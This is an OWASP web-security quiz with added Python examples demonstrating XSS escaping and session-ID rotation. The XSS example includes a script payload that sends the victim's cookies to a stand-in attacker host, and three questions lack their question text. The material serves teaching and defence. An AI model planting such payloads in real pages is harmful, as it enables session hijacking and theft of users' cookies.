OWASP MCQs

Try to answer these OWASP MCQs and check your understanding of the OWASP subject.
Scroll down and let's begin!

1: Which attack can execute scripts in the user's browser and is capable of hijacking user sessions, defacing websites or redirecting the user to malicious sites?

A.   SQL Injection

B.   Cross Site Scripting

C.   Malware Uploading

D.   Man in the middle

2: When an application exposes direct references to its objects, what happens if there is no restricted list of the values a given user is authorized to access?

A.   Brute Forcing of stored encrypted credentials

B.   SQL Injection

C.   XML Injection

D.   Access to sensitive data possible

3: Which attack technique exploits web sites by altering backend database queries through manipulated input?

A.   SQL Injection

B.   XML Injection

C.   Cross Site Request Forgery

D.   OS Commanding

4: What flaw can lead to exposure of resources or functionality to unintended actors?

A.   Session Fixation

B.   Unvalidated Redirects and Forwards

C.   Insecure Cryptographic Storage

D.   Improper Authentication

A.   Cross Site Scripting

B.   Cross Site Tracing

C.   Cross Site Request Forgery

D.   OS Commanding

6: Which threat can be prevented by having unique usernames generated with a high degree of entropy?

A.   Authentication bypass

B.   Cryptanalysis of hash values

C.   Spamming

D.   Authorization Bypass

7: What happens when an application takes user-supplied data and sends it to a web browser without proper validation and escaping?

A.   Security Misconfiguration

B.   Broken Authentication and Session Management

C.   Cross Site Scripting

D.   Insecure Direct Object References
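The flaw in questions 1 and 7, shown with a concrete page. This is an added example and not part of the quiz: a constructed page template reflects a user-supplied display name in two places, once in an element body and once inside a quoted attribute. The payloads and the template are invented for the demonstration; `html.escape` from the standard library does the escaping.

```python
import html

# Constructed attacker-controlled inputs (not from the quiz). The first
# injects a script element into the element body; the second closes the
# attribute value and adds an event handler.
SCRIPT_PAYLOAD = '<script>location="https://evil.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onmouseover="alert(1)'

# Constructed template: the same value lands in two different HTML contexts.
PAGE_TEMPLATE = '<p>Hello, {name}</p>\n<input name="display" value="{name}">'


def render_vulnerable(name: str) -> str:
    """Reflects the value into the page with no escaping (the flaw in Q7)."""
    return PAGE_TEMPLATE.format(name=name)


def render_safe(name: str) -> str:
    """Escapes &, <, >, " and ' so the value is rendered as text in both the
    element-body and the quoted-attribute context. quote=True matters: without
    it the attribute break-out in ATTR_PAYLOAD still works."""
    return PAGE_TEMPLATE.format(name=html.escape(name, quote=True))


def contains_live_markup(page: str) -> bool:
    """Crude check used only for this demo: does the output contain an
    un-escaped script tag or an injected event-handler attribute?"""
    return "<script>" in page or ' onmouseover="' in page


if __name__ == "__main__":
    for payload in (SCRIPT_PAYLOAD, ATTR_PAYLOAD):
        print("vulnerable:", render_vulnerable(payload))
        print("safe:      ", render_safe(payload))
```

Escaping is context-specific: `html.escape` covers element bodies and quoted attributes, but a value placed inside a `<script>` block, a URL, or CSS needs the encoding for that context, and the HttpOnly cookie flag limits what a successful script can steal.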

8: What is phishing?

A.   Cross domain scandal

B.   Data transfer protocol

C.   Email Scam

D.   Network scandal

9: Network permissions should be established so that users can accomplish their tasks but cannot access any system resources that are not necessary, so that

A.   Users will not have access to and misuse system resources

B.   A hacker cannot steal a legitimate user's identity

C.   Only the resources authorized for that user will be at risk

D.   Hackers will not pose as legitimate users

A.   A file that makes it easier to access a Web site and browse

B.   A computer virus

C.   A file that hackers use to steal your identity

D.   Web application file

11: Client-side scripts can be allowed to execute in the browser for needed operations.

A.   True

B.   False

12: Which attack technique forces a user's session credential or session ID to an explicit value?

A.   Session Hijacking

B.   Session Fixation

C.   Brute Force Attack

D.   Dictionary Attack

13: What flaw can lead to exposure of resources or functionality to unintended actors?

A.   Unvalidated Redirects and Forwards

B.   Session Fixation

C.   Improper Authentication

D.   Insecure Cryptographic Storage

14: An IP Address is the Internet equivalent of

A.   Your mailing address

B.   Your Birth Date

C.   Your social security number

D.   Your modem configuration number

15: What flaw arises from session tokens having poor randomness across a range of values?

A.   Insecure Direct Object References

B.   Session Fixation

C.   Session Replay

D.   Session Hijacking

16: Which attack exploits the trust that a site has in a user's browser?

A.   Cross Site Request Forgery

B.   Session Hijacking

C.   SQL Injection

D.   Cross Site Scripting

A.   Cross Site Tracing

B.   OS Commanding

C.   Cross Site Scripting

D.   Cross Site Request Forgery

18: When an application exposes direct references to its objects, what happens if there is no restricted list of the values a given user is authorized to access?

A.   Access to sensitive data possible

B.   SQL Injection

C.   XML Injection

D.   Brute Forcing of stored encrypted credentials

19: What threat arises from not flagging HTTP cookies that carry session tokens as Secure?

A.   Session Hijacking

B.   Session Replay

C.   Insecure Cryptographic Storage

D.   Access Control Violation

20: For a connection that changes from HTTP to HTTPS, what flaw arises if you do not change the session identifier?

A.   Session Hijacking

B.   Cross Site Request Forgery

C.   Cross Site Scripting

D.   Session Replay
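Questions 12, 15, 19 and 20 all concern the same session-management controls, so here is one added example covering them (this code is not part of the quiz page and the session store, user name and cookie name are invented for the demonstration): session IDs drawn from the OS CSPRNG with 256 bits of entropy (Q15), a login that regenerates the ID instead of keeping a client-presented one (Q12, fixation), rotation of the ID on the HTTP-to-HTTPS step (Q20), and a Set-Cookie header carrying the Secure and HttpOnly flags (Q19).

```python
import secrets

# Session-ID length in bytes from the OS CSPRNG: 32 bytes = 256 bits of
# entropy, so IDs cannot be guessed or enumerated (Q15).
SESSION_ID_BYTES = 32


class SessionStore:
    """Minimal server-side session table keyed by an unguessable ID.
    A plain dict constructed for this example; a real deployment would use a
    shared store with expiry."""

    def __init__(self):
        self._sessions = {}  # session_id -> dict of session data

    def create(self, data=None) -> str:
        sid = secrets.token_urlsafe(SESSION_ID_BYTES)
        self._sessions[sid] = dict(data or {})
        return sid

    def get(self, sid):
        return self._sessions.get(sid)

    def rotate(self, old_sid) -> str:
        """Move the session data to a freshly generated ID and invalidate the
        old one. An unknown (for example attacker-chosen) ID yields an empty session."""
        data = self._sessions.pop(old_sid, None) or {}
        return self.create(data)


def login_vulnerable(store: SessionStore, presented_sid: str, username: str) -> str:
    """Keeps whatever session ID the client presented (Q12, session fixation):
    if an attacker planted that ID, the attacker now holds a logged-in session."""
    if store.get(presented_sid) is None:
        presented_sid = store.create()
    store.get(presented_sid)["user"] = username
    return presented_sid


def login_safe(store: SessionStore, presented_sid: str, username: str) -> str:
    """Regenerates the session ID after authentication, so an ID fixed in
    advance is worthless to whoever chose it."""
    new_sid = store.rotate(presented_sid)
    store.get(new_sid)["user"] = username
    return new_sid


def upgrade_to_https(store: SessionStore, http_sid: str) -> str:
    """Q20: an ID that travelled over plain HTTP must be assumed captured, so
    it is rotated rather than carried across to the HTTPS session."""
    return store.rotate(http_sid)


def session_cookie_header(sid: str, secure: bool = True) -> str:
    """Build the Set-Cookie header. Secure keeps the cookie off plain-HTTP
    requests (Q19); HttpOnly keeps it out of reach of injected scripts."""
    attrs = [f"sid={sid}", "Path=/", "HttpOnly", "SameSite=Lax"]
    if secure:
        attrs.append("Secure")
    return "Set-Cookie: " + "; ".join(attrs)


def fixation_demo(login) -> dict:
    """Fixation scenario against a login function: the attacker first obtains
    a valid ID, then gets the victim to log in while presenting that ID."""
    store = SessionStore()
    attacker_sid = store.create()
    victim_sid = login(store, attacker_sid, "alice")
    return {
        "victim_got_new_id": victim_sid != attacker_sid,
        "attacker_id_is_logged_in": (store.get(attacker_sid) or {}).get("user") == "alice",
    }


def upgrade_demo() -> dict:
    """HTTP -> HTTPS transition: old ID dies, session data survives."""
    store = SessionStore()
    http_sid = store.create({"cart": ["item-1"]})
    https_sid = upgrade_to_https(store, http_sid)
    return {
        "old_id_invalid": store.get(http_sid) is None,
        "data_preserved": store.get(https_sid) == {"cart": ["item-1"]},
        "ids_differ": https_sid != http_sid,
    }


if __name__ == "__main__":
    print("vulnerable login:", fixation_demo(login_vulnerable))
    print("safe login:      ", fixation_demo(login_safe))
    print("https upgrade:   ", upgrade_demo())
    print(session_cookie_header(SessionStore().create()))
```

The same rotation routine serves both the login step and the transport upgrade; any privilege or trust boundary the session crosses is a point at which the old identifier should stop working.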